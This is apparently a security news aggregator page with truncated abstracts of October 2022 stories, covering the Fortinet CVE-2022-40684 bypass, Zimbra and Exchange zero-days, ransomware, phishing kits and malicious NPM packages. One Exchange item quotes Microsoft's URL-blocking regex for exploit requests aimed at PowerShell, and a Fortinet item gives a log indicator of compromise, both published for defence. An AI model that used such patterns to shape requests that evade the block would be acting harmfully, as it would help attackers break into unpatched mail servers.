Fortinet on Monday revealed that the newly patched critical security vulnerability impacting its firewall and proxy products is being actively exploited in the wild. Tracked as CVE-2022-40684 (CVSS score: 9.6), the flaw relates to an authentication bypass in FortiOS, FortiProxy, and FortiSwitchManager that could allow a remote attacker to perform unauthorized operations on the administrative interface via specially crafted HTTP(S) requests. "Fortinet is aware of an instance where this vulnerability was exploited, and recommends immediately validating your systems against the following indicator of compromise in the device's logs: user='Local_Process_Access'," the company noted in an advisory. The list of impacted devices is below: FortiOS version 7.2.0 through 7.2.1; FortiOS version 7.0.0 through 7.0.6; FortiProxy version 7.2.0; FortiProxy version 7.0.0 through 7.0.6; FortiSwitchManager version 7.2.0; and FortiSwitchManager version 7.0.0. Updates havThe Hacker News
October 11, 2022 – Vulnerabilities
Critical VM2 flaw lets attackers run code outside the sandbox Full Text
Abstract
Researchers are warning of a critical remote code execution flaw in 'vm2', a JavaScript sandbox library downloaded over 16 million times per month via the NPM package repository.BleepingComputer
October 11, 2022 – Phishing
Caffeine Phishing-as-a-Service Platform Offers Open Registration and Customer Service Support for Attackers Full Text
Abstract
This platform has an intuitive interface and comes at a relatively low cost while providing a multitude of features and tools to its criminal clients to orchestrate and automate core elements of their phishing campaigns.Mandiant
October 11, 2022 – Malware
Hacking group POLONIUM uses ‘Creepy’ malware against Israel Full Text
Abstract
Security researchers reveal previously unknown malware used by the cyber espionage hacking group 'POLONIUM,' threat actors who appear to target Israeli organizations exclusively.BleepingComputer
October 11, 2022 – Government
UK Spy Chief to Warn of ‘Huge’ China Tech Threat Full Text
Abstract
Britain's GCHQ spy agency chief will warn Western countries Tuesday of the "huge threat" from China seeking to exploit its tech dominance to control its own citizens and gain influence abroad.Security Week
October 11, 2022 – Vulnerabilities
New ‘Thermal Attack’ can Read User Passwords From the Heat Signatures Left While Typing Full Text
Abstract
Computer security researchers say they've developed an AI-driven system that can guess computer and smartphone passwords in seconds by examining the heat signatures that fingertips leave on keyboards and screens when entering data.ZDNet
October 11, 2022 – Business
Endor Labs Joins Race to Secure Software Supply Chain Full Text
Abstract
Endor Labs announced the closing of a $25 million seed round to build a dependency lifecycle management platform. Investors betting on Endor Labs include Lightspeed Venture Partners and Dell Technologies Capital.Security Week
October 10, 2022 – Phishing
Caffeine service lets anyone launch Microsoft 365 phishing attacks Full Text
Abstract
A phishing-as-a-service (PhaaS) platform named 'Caffeine' makes it easy for threat actors to launch attacks, featuring an open registration process allowing anyone to jump in and start their own phishing campaigns.BleepingComputer
October 10, 2022 – General
Internet traffic route protection is broken, study claims Full Text
Abstract
An internet security mechanism named Resource Public Key Infrastructure (RPKI), intended to safeguard the routing of data traffic, is broken, according to security experts from Germany's ATHENE, the National Research Center for Applied Cybersecurity.The Register
October 10, 2022 – Malware
Researchers Detail Malicious Tools Used by Cyberespionage Group Earth Aughisky Full Text
Abstract
A new piece of research has detailed the increasingly sophisticated nature of the malware toolset employed by an advanced persistent threat (APT) group named Earth Aughisky. "Over the last decade, the group has continued to make adjustments in the tools and malware deployments on specific targets located in Taiwan and, more recently, Japan," Trend Micro disclosed in a technical profile last week. Earth Aughisky, also known as Taidoor, is a cyber espionage group that's known for its ability to abuse legitimate accounts, software, applications, and other weaknesses in the network design and infrastructure for its own ends. While the Chinese threat actor has been known to primarily target organizations in Taiwan, victimology patterns observed towards late 2017 indicate an expansion to Japan. The most commonly targeted industry verticals include government, telecom, manufacturing, heavy, technology, transportation, and healthcare. Attack chains mounted by the groupThe Hacker News
October 10, 2022 – Vulnerabilities
CVE-2022-40684 flaw in Fortinet products is being exploited in the wild Full Text
Abstract
Fortinet has confirmed that the recently disclosed critical authentication bypass issue (CVE-2022-40684) is being exploited in the wild. Last week, Fortinet addressed a critical authentication bypass flaw, tracked as CVE-2022-40684, that impacted...Security Affairs
October 10, 2022 – Hacker
Hackers behind IcedID malware attacks diversify delivery tactics Full Text
Abstract
The threat actors behind IcedID malware phishing campaigns are utilizing a wide variety of distribution methods, likely to determine what works best against different targets.BleepingComputer
October 10, 2022 – Criminals
Egypt Leaks (EG) Group Spills Financial Information from Egyptian Banks Full Text
Abstract
New cybercriminal group Egypt Leaks has been targeting Egyptian financial institutions and leaking huge volumes of compromised payment data from major Egyptian banks on the dark web. The activity was first spotted in a Telegram channel created to leak Excel files carrying details of 12,229 cre ...Cyware Alerts - Hacker News
October 10, 2022 – Attack
New Report Uncovers Emotet’s Delivery and Evasion Techniques Used in Recent Attacks Full Text
Abstract
Threat actors associated with the notorious Emotet malware are continually shifting their tactics and command-and-control (C2) infrastructure to escape detection, according to new research from VMware. Emotet is the work of a threat actor tracked as Mummy Spider (aka TA542), emerging in June 2014 as a banking trojan before morphing into an all-purpose loader in 2016 that's capable of delivering second-stage payloads such as ransomware. While the botnet's infrastructure was taken down as part of a coordinated law enforcement operation in January 2021, Emotet bounced back in November 2021 through another malware known as TrickBot. Emotet's resurrection, orchestrated by the now-defunct Conti team, has since paved the way for Cobalt Strike infections and, more recently, ransomware attacks involving Quantum and BlackCat. "The ongoing adaptation of Emotet's execution chain is one reason the malware has been successful for so long," researchers from VMwaThe Hacker News
October 10, 2022 – Hacker
Pro-Russia group KillNet targets US airports Full Text
Abstract
The pro-Russia hacktivist group 'KillNet' is behind massive DDoS attacks that hit websites of several major airports in the US. The pro-Russia hacktivist group 'KillNet' is claiming responsibility for massive distributed denial-of-service (DDoS) attacks...Security Affairs
October 10, 2022 – Breach
Toyota discloses data leak after access key exposed on GitHub Full Text
Abstract
Toyota Motor Corporation is warning that customers' personal information may have been exposed after an access key was publicly available on GitHub for almost five years.BleepingComputer
October 10, 2022 – Policy and Law
Biden signs order to implement E.U.-U.S. data privacy framework Full Text
Abstract
“U.S. and EU companies large and small across all sectors of the economy rely upon cross-border data flows to participate in the digital economy and expand economic opportunities,” the administration said in a press statement.NBC News
October 10, 2022 – Breach
Intel Confirms Leak of Alder Lake BIOS Source Code Full Text
Abstract
Chipmaker Intel has confirmed that proprietary source code related to its Alder Lake CPUs has been leaked, following its release by an unknown third-party on 4chan and GitHub last week. The published content contains Unified Extensible Firmware Interface (UEFI) code for Alder Lake, the company's 12th generation processors that were originally launched in November 2021. In a statement shared with Tom's Hardware, Intel said the leak doesn't expose "any new security vulnerabilities as we do not rely on obfuscation of information as a security measure." It's also encouraging the broader security research community to report any potential issues through its bug bounty program, adding it's reaching out to customers to notify them of the matter. Besides the UEFI code, the leaked data dump includes a plethora of files and tools, some of which appear to come from firmware vendor Insyde Software. Exact details surrounding the nature of the hack, incluThe Hacker News
October 10, 2022 – Government
The head of the Federal Cyber Security Authority (BSI) faces dismissal Full Text
Abstract
The German Interior Minister wants to dismiss the head of the Federal Cyber Security Authority (BSI), Arne Schoenbohm, due to possible contacts with Russian security services. German Interior Minister Nancy Faeser wants to dismiss the head of the Federal...Security Affairs
October 10, 2022 – Vulnerabilities
Fortinet says critical auth bypass bug is exploited in attacks Full Text
Abstract
Fortinet has confirmed today that a critical authentication bypass security vulnerability patched last week is being exploited in the wild.BleepingComputer
October 10, 2022 – Attack
Australian Firm Costa Group Suffers Phishing Attack Full Text
Abstract
Australian fruit and vegetable supplier Costa Group says it was subjected to a malicious and sophisticated phishing attack in August that resulted in unauthorized access to its servers.Bank Info Security
October 10, 2022 – Criminals
Hackers Steal $100 Million Cryptocurrency from Binance Bridge Full Text
Abstract
BNB Chain, a blockchain linked to the Binance cryptocurrency exchange, disclosed an exploit on a cross-chain bridge that drained around $100 million in digital assets. "There was an exploit affecting the native cross-chain bridge between BNB Beacon Chain (BEP2) and BNB Smart Chain (BEP20 or BSC), known as 'BSC Token Hub,'" it said last week. "The exploit was through a sophisticated forging of the low level proof into one common library." According to Binance CEO Changpeng Zhao, the exploit on the cross-chain bridge "resulted in extra BNB," prompting a temporary suspension of the Binance Smart Chain (BSC). "BNB, which stands for 'Build and Build' (formerly called Binance Coin), is the blockchain gas token that 'fuels' transactions on BNB Chain," Binance noted earlier this February. No user funds are said to have been impacted, since the vulnerability in the BSC Token Hub bridge enabled the unknown threat actorThe Hacker News
October 10, 2022 – Outage
US airports’ sites taken down in DDoS attacks by pro-Russian hackers Full Text
Abstract
The pro-Russian hacktivist group 'KillNet' is claiming large-scale distributed denial-of-service (DDoS) attacks against the websites of several major airports in the U.S., making them inaccessible.BleepingComputer
October 10, 2022 – General
India: Cyber police asks Gurugram residents to be aware of 5G SIM fraud Full Text
Abstract
With the launch of 5G services in the city, police on Sunday issued an advisory asking residents to be careful of cyber criminals who might try to con them on the pretext of upgrading their SIM cards.Hindustan Times
October 10, 2022 – General
Board members should make CISOs their strategic partners Full Text
Abstract
A new Proofpoint report explores boards of directors’ perceptions about their key cybersecurity challenges and risks. 77% of participants agree cybersecurity is a top priority for their board and 76% discuss the topic at least monthly.Help Net Security
October 10, 2022 – Vulnerabilities
Android vulnerabilities could allow arbitrary code execution Full Text
Abstract
Several vulnerabilities have been patched in the Google Android operating system (OS), the most severe of which could allow for arbitrary code execution. None of the vulnerabilities have been spotted in the wild.Malwarebytes Labs
October 10, 2022 – Breach
Dark web carding site BidenCash gives 1.2M payment cards for free Full Text
Abstract
BidenCash, a popular dark web carding site, released a dump of more than 1.2 million credit cards to promote its service. Operators behind the popular dark web carding market 'BidenCash' have released a dump of 1,221,551 credit cards to promote their...Security Affairs
October 10, 2022 – General
India: Fake Aadhaar, PAN card printing websites use customers’ info for cyber fraud in Uttar Pradesh Full Text
Abstract
Hundreds of fake identity card-printing websites are operating out of Uttar Pradesh and duping people by using their personal information, according to a cybersecurity research firm.The Hindu
October 10, 2022 – Attack
Harvard Business Publishing licensee hit by ransomware Full Text
Abstract
Threat actors got to a database with over 152,000 customer records before its owner, the Turkish branch of Harvard Business Review, closed it. Crooks left a ransom note, threatening to leak the data and inform authorities of the EU’s General Data...Security Affairs
October 10, 2022 – Malware
Maggie Backdoor Eats Up Hundreds of SQL Servers Around the Globe Full Text
Abstract
A new malware strain named Maggie is targeting Microsoft SQL servers and has already backdoored hundreds of machines globally. The malware boasts simple TCP redirection functionality that can allow a remote hacker to connect to any IP address the infected MS-SQL server can reach. The malware's capa ...Cyware Alerts - Hacker News
October 10, 2022 – Malware
RatMilad Spyware Attempts To Penetrate Middle Eastern Enterprises Full Text
Abstract
Mobile security firm Zimperium uncovered a new Android spyware, dubbed RatMilad, sneaking into users' mobile devices for the Middle Eastern enterprises. Researchers have warned that the malware could be used by cybercriminals for numerous purposes ranging from cyberespionage to eavesdropping on vic ...Cyware Alerts - Hacker News
October 09, 2022 – Breach
Intel confirms leaked Alder Lake BIOS Source Code is authentic Full Text
Abstract
Intel has confirmed that a source code leak for the UEFI BIOS of Alder Lake CPUs is authentic and has been released by a third party.BleepingComputer
October 09, 2022 – Malware
Solana Phantom security update NFTs push password-stealing malware Full Text
Abstract
Hackers are airdropping NFTs to Solana cryptocurrency owners pretending to be alerts for a new Phantom security update that lead to the installation of password-stealing malware and the theft of cryptocurrency wallets.BleepingComputer
October 09, 2022 – Criminals
Darkweb market BidenCash gives away 1.2 million credit cards for free Full Text
Abstract
A dark web carding market named 'BidenCash' has released a massive dump of 1,221,551 credit cards to promote their marketplace, allowing anyone to download them for free to conduct financial fraud.BleepingComputer
October 9, 2022 – Criminals
Everest gang demands $200K for data stolen from South Africa state-owned electricity company ESKOM Full Text
Abstract
Everest ransomware operators claimed to have hacked South Africa state-owned company ESKOM Hld SOC Ltd. In March 2022, the Everest ransomware operators published a notice announcing the sale of "South Africa Electricity company's root access" for $125,000....Security Affairs
October 09, 2022 – Phishing
Fake adult sites push data wipers disguised as ransomware Full Text
Abstract
Malicious adult websites push fake ransomware which, in reality, acts as a wiper that quietly tries to delete almost all of the data on your device.BleepingComputer
October 9, 2022 – General
Security Affairs newsletter Round 387 Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter has arrived! Every week, the best security articles from Security Affairs are delivered free to your inbox. If you also want to receive the newsletter with the international press for free, subscribe here. BlackByte...Security Affairs
October 9, 2022 – Attack
CommonSpirit hospital chains hit by ransomware, patients are facing problems Full Text
Abstract
CommonSpirit, one of the largest hospital chains in the US, suffered a ransomware cyberattack that impacted its operations. CommonSpirit, one of the largest hospital chains in the US, this week suffered a ransomware cyberattack that caused severe...Security Affairs
October 9, 2022 – Attack
Lloyd’s of London investigates alleged cyber attack Full Text
Abstract
Lloyd's of London launched on Wednesday an investigation into a possible cyber attack after having detected unusual activity on its network. Lloyd's of London is investigating a cyberattack after detecting unusual network activity this week. In response...Security Affairs
October 08, 2022 – Hacker
Hackers Exploiting Unpatched RCE Flaw in Zimbra Collaboration Suite Full Text
Abstract
A severe remote code execution vulnerability in Zimbra's enterprise collaboration software and email platform is being actively exploited, with no patch currently available to remediate the issue. The shortcoming, assigned CVE-2022-41352, carries a critical-severity rating of CVSS 9.8, providing a pathway for attackers to upload arbitrary files and carry out malicious actions on affected installations. "The vulnerability is due to the method (cpio) in which Zimbra's antivirus engine (Amavis) scans inbound emails," cybersecurity firm Rapid7 said in an analysis published this week. The issue is said to have been abused since early September 2022, according to details shared on Zimbra forums. While a fix is yet to be released, the software services company is urging users to install the "pax" utility and restart the Zimbra services. "If the pax package is not installed, Amavis will fall-back to using cpio, unfortunately the fall-back is iThe Hacker News
October 08, 2022 – Vulnerabilities
Microsoft Issues Improved Mitigations for Unpatched Exchange Server Vulnerabilities Full Text
Abstract
Microsoft on Friday disclosed it has made more improvements to the mitigation method offered as a means to prevent exploitation attempts against the newly disclosed unpatched security flaws in Exchange Server. To that end, the tech giant has revised the blocking rule in IIS Manager from ".*autodiscover\.json.*Powershell.*" to "(?=.*autodiscover\.json)(?=.*powershell)." The list of updated steps to add the URL Rewrite rule is below: Open IIS Manager; Select Default Web Site; In the Feature View, click URL Rewrite; In the Actions pane on the right-hand side, click Add Rule(s)…; Select Request Blocking and click OK; Add the string "(?=.*autodiscover\.json)(?=.*powershell)" (excluding quotes); Select Regular Expression under Using; Select Abort Request under How to block and then click OK; Expand the rule and select the rule with the pattern (?=.*autodiscover\.json)(?=.*powershell) and click Edit under Conditions; Change the Condition input from {UThe Hacker News
October 08, 2022 – Breach
ADATA denies RansomHouse cyberattack, says leaked data from 2021 breach Full Text
Abstract
Taiwanese chip maker ADATA denies claims of a RansomHouse cyberattack after the threat actors began posting the company's stolen files on their data leak site.BleepingComputer
October 8, 2022 – Criminals
LilithBot Malware and Eternity Project’s Cybercrime Operation Full Text
Abstract
The multi-function malware is being constantly developed by its operators who have added anti-VM checks and anti-debugging features too. LilithBot can steal cookies, screenshots, pictures, and browser history from infected systems.Cyware Alerts - Hacker News
October 08, 2022 – Phishing
Callback phishing attacks evolve their social engineering tactics Full Text
Abstract
The BazarCall malicious operation has evolved its social engineering methods, keeping the old fake charges lure for the first phase of the attack but then switching to pretending to help the victim deal with an infection or hack.BleepingComputer
October 8, 2022 – Vulnerabilities
GitHub Repositories Offer Fake Exploits for Exchange Flaws Full Text
Abstract
Microsoft and GTSC disclosed that scammers have jumped on the bandwagon to abuse Exchange flaws by creating GitHub repositories for fake exploits.Cyware Alerts - Hacker News
October 8, 2022 – Vulnerabilities
Researchers Uncover Details on Zero-Day Vulnerability Affecting Zimbra Collaboration and CPIO Full Text
Abstract
In September, an attack was reported in the Zimbra forums where a malicious actor was able to upload a JSP web shell into the public directory to execute a command, generating a pre-authentication key to login to an existing account.Security Boulevard
October 8, 2022 – Ransomware
BlackByte Ransomware abuses vulnerable driver to bypass security solutions Full Text
Abstract
The BlackByte ransomware operators are leveraging a flaw in a legitimate Windows driver to bypass security solutions. Researchers from Sophos warn that BlackByte ransomware operators are using a bring your own vulnerable driver (BYOVD) attack to bypass...Security Affairs
October 8, 2022 – Outage
Cyber Attack Suspected in Hartnell College Network Outage Full Text
Abstract
Hartnell College held an emergency meeting of its governing board this week to discuss the school’s ongoing network outage in response to a potential cybersecurity threat.Government Technology
October 8, 2022 – Vulnerabilities
Unpatched remote code execution flaw in Zimbra Collaboration Suite actively exploited Full Text
Abstract
Threat actors are exploiting an unpatched severe remote code execution vulnerability in the Zimbra collaboration platform. Researchers from Rapid7 are warning of the exploitation of unpatched zero-day remote code execution vulnerability, tracked as CVE-2022-41352,...Security Affairs
October 8, 2022 – Attack
State Bar of Georgia Notifies Members and Employees of Cybersecurity Incident Full Text
Abstract
The State Bar of Georgia announced that it experienced a cybersecurity incident that resulted in unauthorized access to its systems. After learning of the incident, the State Bar worked to restore its systems safely and resume normal operations.Dark Reading
October 8, 2022 – Phishing
Toyota Warns Thousands of Customers That They May Get Scam Emails After Data Leak Full Text
Abstract
Around 296,000 pieces of customer information from the T-Connect service might have been leaked. Toyota released a statement warning its customers that they may be at risk of receiving phishing scams or unsolicited emails to their email addresses.Gizmodo
October 07, 2022 – Ransomware
The Week in Ransomware - October 7th 2022 - A 20 year sentence Full Text
Abstract
It was a very quiet week regarding ransomware news, with the most significant news being the sentencing of a Netwalker affiliate to 20 years in prison.BleepingComputer
October 7, 2022 – Vulnerabilities
New cryptojacking campaign exploits OneDrive vulnerability Full Text
Abstract
In a new development, cybersecurity software maker Bitdefender has detected a cryptojacking campaign that uses a Microsoft OneDrive vulnerability to gain persistence and run undetected on infected devices.CSO Online
October 07, 2022 – Vulnerabilities
Fortinet Warns of New Auth Bypass Flaw Affecting FortiGate and FortiProxy Full Text
Abstract
Fortinet has privately warned its customers of a security flaw affecting FortiGate firewalls and FortiProxy web proxies that could potentially allow an attacker to perform unauthorized actions on susceptible devices. Tracked as CVE-2022-40684, the high-severity flaw relates to an authentication bypass vulnerability that could permit an unauthenticated adversary to perform arbitrary operations on the administrative interface. The issue impacts the following versions, and has been addressed in FortiOS versions 7.0.7 and 7.2.2, and FortiProxy version 7.0.7 released this week: FortiOS from 7.0.0 to 7.0.6 and from 7.2.0 to 7.2.1; FortiProxy from 7.0.0 to 7.0.6 and 7.2.0. "Due to the ability to exploit this issue remotely, Fortinet is strongly recommending all customers with the vulnerable versions to perform an immediate upgrade," the company cautioned in an alert shared by a security researcher named Gitworm on Twitter. When reached for a comment, FortineThe Hacker News
October 7, 2022 – Vulnerabilities
VMware fixed a high-severity bug in vCenter Server Full Text
Abstract
VMware this week addressed a severe vulnerability in vCenter Server that could lead to arbitrary code execution. VMware on Thursday released security patches to address a code execution vulnerability, tracked as CVE-2022-31680 (CVSS score of 7.2),...Security Affairs
October 07, 2022 – Breach
2K Games warns users their stolen data is now up for sale online Full Text
Abstract
Video game publisher 2K emailed users on Thursday to warn that some of their personal info was stolen and put up for sale online following a September 19 security breach.BleepingComputer
October 7, 2022 – Vulnerabilities
Fortinet urges customers to immediately fix a critical authentication bypass flaw in FortiGate and FortiProxy Full Text
Abstract
Customers that are not able to upgrade their systems should restrict access to their devices to a specific set of IP addresses. At this time it is not clear if the vulnerability has been actively exploited in attacks in the wild.Security Affairs
October 07, 2022 – Malware
Facebook Detects 400 Android and iOS Apps Stealing Users' Log-in Credentials Full Text
Abstract
Meta Platforms on Friday disclosed that it had identified over 400 malicious apps on Android and iOS that it said targeted online users with the goal of stealing their Facebook login information. "These apps were listed on the Google Play Store and Apple's App Store and disguised as photo editors, games, VPN services, business apps, and other utilities to trick people into downloading them," the social media behemoth said in a report shared with The Hacker News. 42.6% of the rogue apps were photo editors, followed by business utilities (15.4%), phone utilities (14.1%), games (11.7%), VPNs (11.7%), and lifestyle apps (4.4%). Interestingly, a majority of the iOS apps posed as ads manager tools for Meta and its Facebook subsidiary. Besides concealing its malicious nature as a set of seemingly harmless apps, the operators of the scheme also published fake reviews that were designed to offset the negative reviews left by users who may have previously downloaded the appsThe Hacker News
October 7, 2022 – Vulnerabilities
Fortinet urges customers to immediately fix a critical authentication bypass flaw in FortiGate and FortiProxy Full Text
Abstract
Fortinet addressed a critical authentication bypass vulnerability that impacted FortiGate firewalls and FortiProxy web proxies. Fortinet addressed a critical authentication bypass flaw, tracked as CVE-2022-40684, that impacted FortiGate firewalls...Security Affairs
October 07, 2022 – Hacker
Hackers exploiting unpatched RCE bug in Zimbra Collaboration Suite Full Text
Abstract
Hackers are actively exploiting an unpatched remote code execution (RCE) vulnerability in Zimbra Collaboration Suite (ZCS), a widely deployed web client and email server.BleepingComputer
October 7, 2022 – Vulnerabilities
VMware Patches Code Execution Vulnerability in vCenter Server Full Text
Abstract
VMware announced patches for a vCenter Server vulnerability that could lead to arbitrary code execution. Tracked as CVE-2022-31680 (CVSS score: 7.2), it's described as an unsafe deserialization vulnerability in the platform services controller (PSC).Security Week
October 07, 2022 – General
The essentials of GRC and cybersecurity — How they empower each other Full Text
Abstract
Understanding the connection between GRC and cybersecurity When talking about cybersecurity, Governance, Risk, and Compliance (GRC) is often considered the least exciting part of business protection. However, its importance can't be ignored, and this is why. While cybersecurity focuses on the technical side of protecting systems, networks, devices, and data, GRC is the tool that will help the entire organization understand and communicate how to do it. What does it mean? GRC tools like StandardFusion help companies define and implement the best practices, procedures, and governance to ensure everyone understands the risks associated with their actions and how they can affect business security, compliance, and success. In simple words, GRC is the medium for creating awareness around cybersecurity's best practices to reduce risks and achieve business goals. Why is cybersecurity more relevant than ever before Cybersecurity aims to protect sensitive business data, intelleThe Hacker News
October 7, 2022 – Cryptocurrency
Hacker stole $566 million worth of Binance Coins from Binance Bridge Full Text
Abstract
Threat actors have stolen 2 million Binance Coins (BNB), worth $566 million, from the popular Binance Bridge. Hackers have reportedly stolen $566 million worth of Binance Coins (BNB) from the Binance Bridge. It seems that threat actors were able...Security Affairs
October 07, 2022 – Vulnerabilities
Fortinet warns admins to patch critical auth bypass bug immediately Full Text
Abstract
Fortinet has warned administrators to update FortiGate firewalls and FortiProxy web proxies to the latest versions, which address a critical severity vulnerability.BleepingComputer
October 7, 2022 – Policy and Law
Meta Has Sued Chinese Companies for Stealing One Million WhatsApp Accounts Full Text
Abstract
Meta is suing the app developers, two Chinese and one Taiwanese, for orchestrating a massive fraud. The developers lured WhatsApp users to self-compromise their accounts.I Tech Post
October 07, 2022 – Malware
LofyGang Distributed ~200 Malicious NPM Packages to Steal Credit Card Data Full Text
Abstract
Multiple campaigns that distributed trojanized and typosquatted packages on the NPM open source repository have been identified as the work of a single threat actor dubbed LofyGang. Checkmarx said it discovered 199 rogue packages totaling thousands of installations, with the group operating for over a year with the goal of stealing credit card data as well as user accounts associated with Discord Nitro, gaming, and streaming services. "LofyGang operators are seen promoting their hacking tools in hacking forums, while some of the tools are shipped with a hidden backdoor," the software security company said in a report shared with The Hacker News prior to its publication. Various pieces of the attack puzzle have already been reported by JFrog, Sonatype, and Kaspersky (which called it LofyLife), but the latest analysis pulls the various operations together under one organizational umbrella that Checkmarx is referring to as LofyGang. Believed to be an organized crThe Hacker News
October 7, 2022 – Malware
LilithBot Malware, a new MaaS offered by the Eternity Group Full Text
Abstract
Researchers linked the threat actor behind the Eternity malware-as-a-service (MaaS) to a new malware strain called LilithBot. Zscaler researchers linked a recently discovered sample of a new malware called LilithBot to the Eternity group (aka...Security Affairs
October 07, 2022 – Hacker
LofyGang hackers built a credential-stealing enterprise on Discord, NPM Full Text
Abstract
A threat group using the name 'LofyGang', operating since 2020, is considered responsible for creating and distributing over 200 malicious packages on multiple code hosting platforms, including GitHub and NPM.BleepingComputer
October 7, 2022 – Phishing
Water Labbu Hijacks Crypto Transactions from Scam Websites Full Text
Abstract
Water Labbu, a new threat actor, was observed targeting cryptocurrency scam websites to steal cryptocurrency from the wallets of other scammers through malicious DApps. The profit made by the attacker is believed to be $316,728, looking at the transactions from nine victims. Experts suggest that us ...Cyware Alerts - Hacker News
October 07, 2022 – Vulnerabilities
Hackers Can Use ‘App Mode’ in Chromium Browsers’ for Stealth Phishing Attacks Full Text
Abstract
In what's a new phishing technique, it has been demonstrated that the Application Mode feature in Chromium-based web browsers can be abused to create "realistic desktop phishing applications." Application Mode is designed to offer native-like experiences in a manner that causes the website to be launched in a separate browser window, while also displaying the website's favicon and hiding the address bar. According to security researcher mr.d0x – who also devised the browser-in-the-browser (BitB) attack method earlier this year – a bad actor can leverage this behavior to resort to some HTML/CSS trickery and display a fake address bar on top of the window and fool users into giving up their credentials on rogue login forms. "Although this technique is meant more towards internal phishing, you can technically still use it in an external phishing scenario," mr.d0x said. "You can deliver these fake applications independently as files." This isThe Hacker News
October 7, 2022 – Attack
Cyberattack Impacts City of Dunedin’s Email, Permit Payments, Utility Billing, and Inspection Scheduling Full Text
Abstract
Dunedin's water and wastewater facilities are secure, and city phones are working. However, city email, online payments for permits, inspection scheduling, utility billing, and Parks & Recreation programs, and Marina fees are all not working.USF
October 07, 2022 – Ransomware
BlackByte Ransomware Abuses Vulnerable Windows Driver to Disable Security Solutions Full Text
Abstract
In yet another case of bring your own vulnerable driver (BYOVD) attack, the operators of the BlackByte ransomware are leveraging a flaw in a legitimate Windows driver to bypass security solutions. "The evasion technique supports disabling a whopping list of over 1,000 drivers on which security products rely to provide protection," Sophos threat researcher Andreas Klopsch said in a new technical write-up. BYOVD is an attack technique that involves threat actors abusing vulnerabilities in legitimate, signed drivers to achieve successful kernel-mode exploitation and seize control of compromised machines. Weaknesses in signed drivers have been increasingly co-opted by nation-state threat groups in recent years, including Slingshot, InvisiMole, APT28, and most recently, the Lazarus Group. BlackByte, believed to be an offshoot of the now-discontinued Conti group, is part of the big game cybercrime crews, which zeroes in on large, high-profile targets as part ofThe Hacker News
October 7, 2022 – Breach
Update: 2K warns users their info has been stolen following breach of its help desk Full Text
Abstract
2K warned users to remain on the lookout for suspicious activity across their accounts following a breach last month that allowed a threat actor to obtain email addresses, names, and other sensitive information provided to 2K's support team.ARS Technica
October 7, 2022 – APT
APT Groups Target U.S. Government Agencies with CovalentStealer Full Text
Abstract
The U.S. government alerted against state-backed hackers using the custom CovalentStealer malware and Impacket framework to steal confidential information from a Defense Industrial Base organization. To gain initial access through the victim’s network, the attackers attempted to exploit ProxyLogon ...Cyware Alerts - Hacker News
October 7, 2022 – Vulnerabilities
Critical flaw in open source WebPageTest remains unpatched Full Text
Abstract
In a blog post dated September 23, ManoMano researcher Louka “Laluka” Jacques-Chevallier discussed his discovery of a pre-authentication RCE vulnerability in the open-source project WebPageTest.The Daily Swig
October 06, 2022 – Criminals
Hacker steals $566 million worth of crypto from Binance Bridge Full Text
Abstract
Hackers have reportedly stolen 2 million Binance Coins (BNB), worth $566 million, from the Binance Bridge.BleepingComputer
October 6, 2022 – Malware
Detecting fileless malware infections is becoming easier Full Text
Abstract
Without memory analysis capabilities, security teams would be hard-pressed to identify fileless malware because it differs from traditional malware in how it breaches systems.Help Net Security
October 06, 2022 – Criminals
Eternity Group Hackers Offering New LilithBot Malware as a Service to Cybercriminals Full Text
Abstract
The threat actor behind the malware-as-a-service (MaaS) called Eternity has been linked to a new piece of malware called LilithBot. "It has advanced capabilities to be used as a miner, stealer, and a clipper along with its persistence mechanisms," Zscaler ThreatLabz researchers Shatak Jain and Aditya Sharma said in a Wednesday report. "The group has been continuously enhancing the malware, adding improvements such as anti-debug and anti-VM checks." Eternity Project came on the scene earlier this year, advertising its warez and product updates on a Telegram channel. The services provided include a stealer, miner, clipper, ransomware, USB worm, and a DDoS bot. LilithBot is the latest addition to this list. Like its counterparts, the multifunctional malware bot is sold on a subscription basis to other cybercriminals in return for a cryptocurrency payment. Upon a successful compromise, the information gathered through the bot – browser history, cookies, pictuThe Hacker News
October 6, 2022 – General
Cybersecurity Regulation: It’s Not ‘Performance-Based’ If Outcomes Can’t Be Measured Full Text
Abstract
A closer look at the TSA’s cybersecurity directive for pipelines casts doubt on the applicability of “performance-based” regulation to cybersecurity. For now, policymakers have to combine management-based controls and technology-specific prescriptions.Lawfare
October 6, 2022 – Vulnerabilities
Watch out, a bug in Linux Kernel 5.19.12 can damage displays on Intel laptops Full Text
Abstract
A bug in Linux Kernel 5.19.12 that was released at the end of September 2022 can potentially damage the displays of Intel laptops. Linux users reported the displays of their Intel laptops rapidly blinking, flickering, and showing white flashes after...Security Affairs
October 06, 2022 – Government
FBI warns of disinformation threats before 2022 midterm elections Full Text
Abstract
The Federal Bureau of Investigation (FBI) warned today of foreign influence operations that might spread disinformation to affect the results of this year's midterm elections.BleepingComputer
October 6, 2022 – Vulnerabilities
Cisco fixed two high-severity bugs in Communications, Networking Products Full Text
Abstract
Cisco announced it has addressed high-severity vulnerabilities affecting some of its networking and communications products, including Enterprise NFV, Expressway, and TelePresence.Security Affairs
October 06, 2022 – Vulnerabilities
Details Released for Recently Patched new macOS Archive Utility Vulnerability Full Text
Abstract
Security researchers have shared details about a now-addressed security flaw in Apple's macOS operating system that could be potentially exploited to run malicious applications in a manner that can bypass Apple's security measures. The vulnerability, tracked as CVE-2022-32910, is rooted in the built-in Archive Utility and "could lead to the execution of an unsigned and unnotarized application without displaying security prompts to the user, by using a specially crafted archive," Apple device management firm Jamf said in an analysis. Following responsible disclosure on May 31, 2022, Apple addressed the issue as part of macOS Big Sur 11.6.8 and Monterey 12.5 released on July 20, 2022. The tech giant, for its part, also revised the earlier-issued advisories as of October 4 to add an entry for the flaw. Apple described the bug as a logic issue that could allow an archive file to get around Gatekeeper checks, which is designed so as to ensure that only trustedThe Hacker News
October 6, 2022 – Vulnerabilities
Cisco fixed two high-severity bugs in Communications, Networking Products Full Text
Abstract
Cisco fixed high-severity flaws in some of its networking and communications products, including Enterprise NFV, Expressway and TelePresence. Cisco announced it has addressed high-severity vulnerabilities affecting some of its networking and communications...Security Affairs
October 06, 2022 – Government
US govt shares top flaws exploited by Chinese hackers since 2020 Full Text
Abstract
NSA, CISA, and the FBI revealed today the top security vulnerabilities most exploited by hackers backed by the People's Republic of China (PRC) to target U.S. government and critical infrastructure networks.BleepingComputer
October 6, 2022 – General
When transparency is also obscurity: The conundrum that is open-source security Full Text
Abstract
